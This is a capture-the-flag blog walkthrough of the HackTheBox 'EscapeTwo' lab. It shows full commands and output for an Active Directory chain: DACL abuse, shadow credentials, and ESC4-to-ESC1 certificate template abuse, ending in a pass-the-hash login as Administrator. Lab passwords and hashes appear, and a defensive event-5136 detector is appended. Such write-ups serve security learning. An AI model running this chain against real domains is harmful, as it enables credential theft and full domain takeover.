┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20260121-024829.bak
[*] DACL modified successfully!

[Core principle deep dive] DAC, discretionary access control

DACL and Owner mechanism: every Windows securable object carries a DACL (Discretionary Access Control List). Escalation logic: the operating system guarantees that an object's owner always has the right to modify that object's DACL (WRITE_DAC). Attack chain: hold WriteOwner -> set the Owner to yourself -> you now hold the right to modify the ACL -> grant yourself GenericAll (Full Control) -> complete control of the target object.

Next I originally wanted to set up shadow credentials to get ca_svc's hash, but it kept erroring, so I could only change the password.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.129.186.96'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[-] Got error: socket connection error while opening: timed out
[-] Use -debug to print a stacktrace

After resetting the target machine, though, it worked again.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy shadow auto -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 -account 'ca_svc' -dc-ip 10.129.186.117
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ac8531c5-99b8-8310-0b81-bb01fd9ff206'
[*] Adding Key Credential with device ID 'ac8531c5-99b8-8310-0b81-bb01fd9ff206' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'ac8531c5-99b8-8310-0b81-bb01fd9ff206' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

Shadow Credentials technique: it abuses the authentication mechanism of Windows Hello for Business (WHfB). msDS-KeyCredentialLink: an attribute of AD user objects that stores authentication public keys. Attack flow:

  1. The attacker (holding write access to the attribute) generates an RSA key pair.
  2. The public key is written into the target user's msDS-KeyCredentialLink attribute.
  3. Using the matching private key, a TGT is requested from the KDC through the Kerberos PKINIT extension.
  4. The KDC verifies that the public key matches and issues a TGT. The tool then recovers the target's NTLM hash from the TGT. Advantage: no need to reset the target's password, so it is very stealthy.

Either way, we now have ca_svc's hash.

Since ca_svc is a certificate publisher, let's check as that identity whether any template is vulnerable.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy find -vulnerable -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.186.117 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (198.18.0.20:445)] timed out
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

Logging in with ca_svc's hash shows that it belongs to the Cert Publishers group, and that this group has write permissions on the DunderMifflinAuthentication certificate template, which matches the ESC4 pattern.

Use ca_svc's permissions to overwrite the DunderMifflinAuthentication template (the box was lagging badly, so the IP changed again).

┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]
└──╼ #certipy template -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.186.117 -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'


Then request an administrator certificate with the modified template. Note: this command must be run promptly after the update.

┌─[root@htb-4w9mye2vqf][/home/skyarrow/Desktop]
└──╼ #certipy req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.129.186.117 -dns 10.129.186.117 -dc-ip 10.129.186.117
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with multiple identifications
UPN: 'Administrator@sequel.htb'
DNS Host Name: '10.129.186.117'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'
┌─[root@htb-4w9mye2vqf][/home/skyarrow/Desktop]

Obtain the administrator hash from the certificate.

┌─[root@htb-4w9mye2vqf][/home/skyarrow/Desktop]
└──╼ #certipy auth -pfx administrator_10.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'Administrator@sequel.htb'
[1] DNS Host Name: '10.129.186.117'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Then just log in.

┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -H 7a8d4e04986afa8ed4060f75e5a0b3ff -u 'administrator' -i 10.129.186.133

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
18ff3ce3ee8f6f2a78e10221d0956c59

Configuration is the vulnerability: a certificate template defines the rules under which certificates are issued. ESC4 (vulnerable template access control): the attacker has write access to the template object. ESC1 (SAN spoofing): by modifying the configuration, the attacker enables the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag, which lets the requester put an arbitrary user (such as Administrator) in the SAN (Subject Alternative Name) field of the CSR (certificate signing request). End result: AD CS trusts the template configuration -> issues an "Administrator" certificate -> the domain controller trusts certificates issued by the CA -> the attacker obtains domain admin rights. It is a complete loop from "configuration permission" to "identity forgery".
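Every stage of the chain above (owner/DACL rewrite on ca_svc, the msDS-KeyCredentialLink write, the template flag change) is an LDAP modification that a domain controller with directory-service-changes auditing logs as Security event 5136. The following is an added example, not code from the original post: a small detector run over constructed JSON log lines whose field names are modelled on event 5136 (SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType, AttributeValue); the SDDL and key-credential blobs are placeholders, and the %%14674 / %%14675 operation codes are the "Value Added" / "Value Deleted" markers.

```python
import json

# msPKI-Certificate-Name-Flag bit that lets the requester supply the subject/SAN (MS-CRTD)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# OperationType code that event 5136 uses for "Value Added"
VALUE_ADDED = "%%14674"

# Constructed sample log, one JSON record per line; values are placeholders, not captured data.
SAMPLE_LOG = """\
{"EventID":5136,"SubjectUserName":"ryan","ObjectClass":"user","ObjectDN":"CN=ca_svc,CN=Users,DC=sequel,DC=htb","AttributeLDAPDisplayName":"nTSecurityDescriptor","OperationType":"%%14674","AttributeValue":"O:<ryan-sid>G:DUD:AI(A;;GA;;;<ryan-sid>)"}
{"EventID":5136,"SubjectUserName":"ryan","ObjectClass":"user","ObjectDN":"CN=ca_svc,CN=Users,DC=sequel,DC=htb","AttributeLDAPDisplayName":"msDS-KeyCredentialLink","OperationType":"%%14674","AttributeValue":"B:828:<constructed-blob>:CN=ca_svc,CN=Users,DC=sequel,DC=htb"}
{"EventID":5136,"SubjectUserName":"ca_svc","ObjectClass":"pKICertificateTemplate","ObjectDN":"CN=DunderMifflinAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb","AttributeLDAPDisplayName":"msPKI-Certificate-Name-Flag","OperationType":"%%14674","AttributeValue":"1"}
{"EventID":5136,"SubjectUserName":"alice","ObjectClass":"user","ObjectDN":"CN=alice,CN=Users,DC=sequel,DC=htb","AttributeLDAPDisplayName":"msDS-KeyCredentialLink","OperationType":"%%14674","AttributeValue":"B:828:<constructed-blob>:CN=alice,CN=Users,DC=sequel,DC=htb"}
{"EventID":5136,"SubjectUserName":"ca_svc","ObjectClass":"pKICertificateTemplate","ObjectDN":"CN=DunderMifflinAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb","AttributeLDAPDisplayName":"msPKI-Certificate-Name-Flag","OperationType":"%%14675","AttributeValue":"0"}
"""


def rdn_name(dn):
    """'CN=ca_svc,CN=Users,...' -> 'ca_svc' (the object's name from its first RDN)."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def name_flag_allows_san(value):
    """True if msPKI-Certificate-Name-Flag has ENROLLEE_SUPPLIES_SUBJECT set.

    The attribute is a 32-bit value that the log renders as a signed decimal string,
    so mask to 32 bits before testing the bit.
    """
    try:
        return bool((int(value) & 0xFFFFFFFF) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    except ValueError:
        return False


def classify(event):
    """Return a rule label if the event matches one stage of the chain, else None."""
    if event.get("EventID") != 5136 or event.get("OperationType") != VALUE_ADDED:
        return None                      # a modify shows up as delete + add; only the add matters
    attr = event.get("AttributeLDAPDisplayName", "")
    cls = event.get("ObjectClass", "")
    subject = event.get("SubjectUserName", "").lower()
    target = rdn_name(event.get("ObjectDN", "")).lower()
    # Baseline: a user enrolling their own WHfB key writes their own attribute (subject == target).
    if attr == "msDS-KeyCredentialLink" and subject != target:
        return "shadow-credentials: key credential added to another account"
    # Owner/DACL changes on a principal made by someone other than that principal;
    # tune with an allow-list of administrative accounts in a real deployment.
    if attr == "nTSecurityDescriptor" and cls in ("user", "computer") and subject != target:
        return "dacl-change: security descriptor of another principal rewritten"
    if (cls == "pKICertificateTemplate" and attr == "msPKI-Certificate-Name-Flag"
            and name_flag_allows_san(event.get("AttributeValue", ""))):
        return "esc4-to-esc1: template now lets the enrollee supply the subject"
    return None


def scan(log_text):
    """Run classify() over JSON log lines; return (subject, object name, rule) per alert."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        rule = classify(ev)
        if rule:
            alerts.append((ev["SubjectUserName"], rdn_name(ev["ObjectDN"]), rule))
    return alerts


if __name__ == "__main__":
    for subject, obj, rule in scan(SAMPLE_LOG):
        print(f"{subject} -> {obj}: {rule}")
```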


http://example.com/2026/01/21/从零开始的windows生活-EscapeTwo/
Author: Skyarrow
Posted on: January 21, 2026